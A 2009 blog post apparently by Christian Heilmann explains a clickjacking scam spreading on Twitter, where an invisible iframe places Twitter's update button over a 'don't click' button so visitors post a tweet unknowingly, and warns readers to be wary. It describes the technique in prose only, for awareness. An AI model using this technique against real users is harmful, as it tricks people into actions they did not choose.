Christian Heilmann

Don’t click this – a clickjacking experiment currently hammering twitter

Thursday, February 12th, 2009 at 7:29 pm

Reverse psychology is an interesting thing. Currently Twitter is being hammered by thousands of people twittering about a page that has a button that tells them not to click it. Why do they do it? Because they are told not to. How come they are twittering about it? A small thing called clickjacking.

Scott Schiller shows in a screenshot how the trick works:

The page with the don’t click button actually has an iframe over the button that loads your twitter.com/home page with the predefined tweet about going to the site. The iframe also positions your update button to cover the “don’t click this” button and has an opacity of 0 so you do submit your tweet without knowing it.

The scam works. If you currently check twitter search for “don’t click” then you’ll have an amazing amount of fresh tweets every few seconds. There’s also a French version in the wild

So if you get the tweet, don’t follow the page. If you see a button to click, be very wary of what is going on there!

Tags: , , ,

Share on Mastodon (needs instance)

Share on Twitter

Newsletter

Check out the Dev Digest Newsletter I write every week for WeAreDevelopers. Latest issues:

160: Graphs and RAGs explained and VS Code extension hacks Graphs and RAG explained, how AI is reshaping UI and work, how to efficiently use Cursor, VS Code extensions security issues.
159: AI pipelines, 10x faster TypeScript, How to interview How to use LLMs to help you write code and how much electricity does that use? Is your API secure? 10x faster TypeScript thanks to Go!
158: 🕹️ Super Mario AI 🔑 API keys in LLMs 🤙🏾 Vibe Coding Why is AI playing Super Mario? How is hallucinating the least of our worries and what are rules for developing Safety Critical Code?
157: CUDA in Python, Gemini Code Assist and back-dooring LLMs We met with a CUDA expert from NVIDIA about the future of hardware, we look at how AI fails and how to play pong on 140 browser tabs.
156: Enterprise dead, all about Bluesky and React moves on! Learn about Bluesky as a platform, how to build a React App and how to speed up SQL. And play an impossible game in the browser.

My other work: